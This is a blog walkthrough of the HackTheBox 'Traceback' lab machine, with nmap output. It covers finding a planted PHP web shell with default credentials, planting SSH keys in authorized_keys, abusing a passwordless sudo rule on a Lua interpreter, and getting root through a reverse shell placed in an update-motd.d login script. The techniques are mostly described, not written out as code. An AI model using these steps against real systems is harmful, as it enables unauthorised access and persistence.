HackTheBox Traceback Writeup – 10.10.10.181

HackTheBox Traceback Writeup – 10.10.10.181

HackTheBox Traceback is a new Linux machine released on 14th March. The machine is categorized as easy and by the term “easy” you can emphasize the first blood was taken in about 15 mins after the release.

As like everyone, I too tried my luck, honestly I took like more than an hour to finish as I lost a couple of times, but in reality the machine was pretty neat and well-made, I liked the way the machine was designed. Here is my writeup of Traceback – 10.10.10.181.

Let us start.

NAMP SCAN

As always, I started off with adding machine IP 10.10.10.181 to my hosts file as traceback.htb.

# root @ ns09 in ~/htb/traceback [17:35:45] 
$ nmap -T4 -A -p- -oS namp.scan traceback.htb 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-15 17:35 +03
Nmap scan report for traceback.htb (10.10.10.181)
Host is up (0.15s latency).
Not shown: 65483 closed ports, 50 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=3/15%OT=22%CT=1%CU=36624%PV=Y%DS=2%DC=T%G=Y%TM=5E6E3F4
OS:3%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 199/tcp)
HOP RTT       ADDRESS
1   153.81 ms 10.10.14.1
2   154.16 ms traceback.htb (10.10.10.181)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 508.85 seconds

Nmap says it can only find two ports open. A TCP 80 and SSH at 22. The default page in the Port 80 says the website has been hacked with a message: “I have left a backdoor for all the net. FREE INTERNETZZZ”

After looking at the page source, I understood what “Backdoor” the hacker was talking about. There is a web-shell, the hacker want us to find.

A quick Google search “best web shell” led me to a GitHub page which contains a number of web-shells. Since the commented part “Some of the best web shells that you might need ;)” that matches the description of the GitHub page, I know that this page has something to do with the shell the machine author is taking about.

What I did was something silly, I copied the web-shell file name one by one and try if the shell really exists. None of then worked until I reach the last but one “ smevk.php“, is the web-shell made by Kashif Khan.

And looking at the source-code I found the default username and password is admin:admin

I logged-in and this was the web-shell control panel:

The web-shells normally contains execute option, so this shell as well has the option to run commands. A quick whoami showed me the shell running as webadmin but has no access to root. I tried to list the files in the directory:

Building my own /home/webadmin/.ssh/authorized_keys on the machine

Once I’m in I made a small tour inside the directories. I found authorized_keys inside the home, so I decided to use it as an opportunity and get the ssh.

It was pretty easy as the Web-shell has execute and upload commands option. I made a fresh SSH key pair in my Kali and renamed the id_rsa.pub to “authorized_keys” and upload it to “/home/webadmin/.ssh/” directory.

Once the file is uploaded, I run the ssh from terminal and I have the proper SSH on the machine as webadmin.

Privilege escalation and Getting User.txt

Running sudo -l showed the user webadmin can execute any scripts in /home/webadmin/luvit directory as sysadmin without password. And there is a note discussing a tool called “Lua”.

# root @ ns09 in ~/htb/traceback [23:24:20] 
$ ssh -i /root/.ssh/id_rsa webadmin@10.10.10.181
#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################
Welcome to Xh4H land 
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sun Mar 15 13:20:27 2020 from 10.10.14.8
webadmin@traceback:~$ id
uid=1000(webadmin) gid=1000(webadmin) groups=1000(webadmin),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)
webadmin@traceback:~$ 
webadmin@traceback:~$ sudo -l
Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/webadmin/luvit
webadmin@traceback:~$ ls
icyb3r.lua  luvit  note.txt  privesc.lua
webadmin@traceback:~$ cat note.txt
- sysadmin -
I have left this tool to practice Lua. Contact me if you have any question.
webadmin@traceback:~$ 

Going further I read the contents of two other files.

The .lua extension is something new for me. A quick Google search informed me “Lua is a powerful and fast programming language that is easy to learn and use and to embed into your application. Lua is designed to be a lightweight embeddable scripting language. It is used for all sorts of applications, from games to web applications and image processing.

I didn’t find anything that requires the Lua language at this point, so what I need to do is, run the SSH as SysAdmin. To run this, I need to copy my authorized keys to “/home/sysadmin/.ssh/authorized_keys”.

Pretty easy, I opened the “nano privesc.lua” using nano and replaced the default ssh key with my own key and saved it. After this I need to run “sudo -u sysadmin /home/webadmin/luvit privesc.lua”.

Then I SSH the box as Sysadmin, got the shell and grab the user.txt

Privilege Escalation #2 and Getting The Root

As I have SysAdmin privilege, I started to look for useful things inside the box,

After running PSPY I noticed this:

When an user ssh the box “/bin/sh -c sleep 30 ; / bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/“ runs as root, and the “run-parts —lsbsysinit /etc/update-motd.d” runs afterwards.

The file was found in the /etc/ directory.

The point is, update-mod.d runs as root when a user logs in, the script shows the welcome banner. The service skips the release if under-development and the login session continues.

What I did was, I amend my reverse shell script into the 00-header file. Then I set up the listener. Opened a new terminal and logged-in as sysadmin and boom I’m root.

That’s it, Traceback was really a funny and easy box. I learned a couple of things. Thank you Xh4H for the nice build. thank you for reading.

Appreciate your respect+ 🙂 here: https://www.hackthebox.eu/home/users/profile/68523

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

You may also like...

Subscribe
Notify of
guest
1 Comment
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
trackback
7 months ago

[…] from the machine “Traceback” the write-ups in nav1n.com are locked with either the Administrator password hash (if it is Windows […]

Sorry, that action is blocked.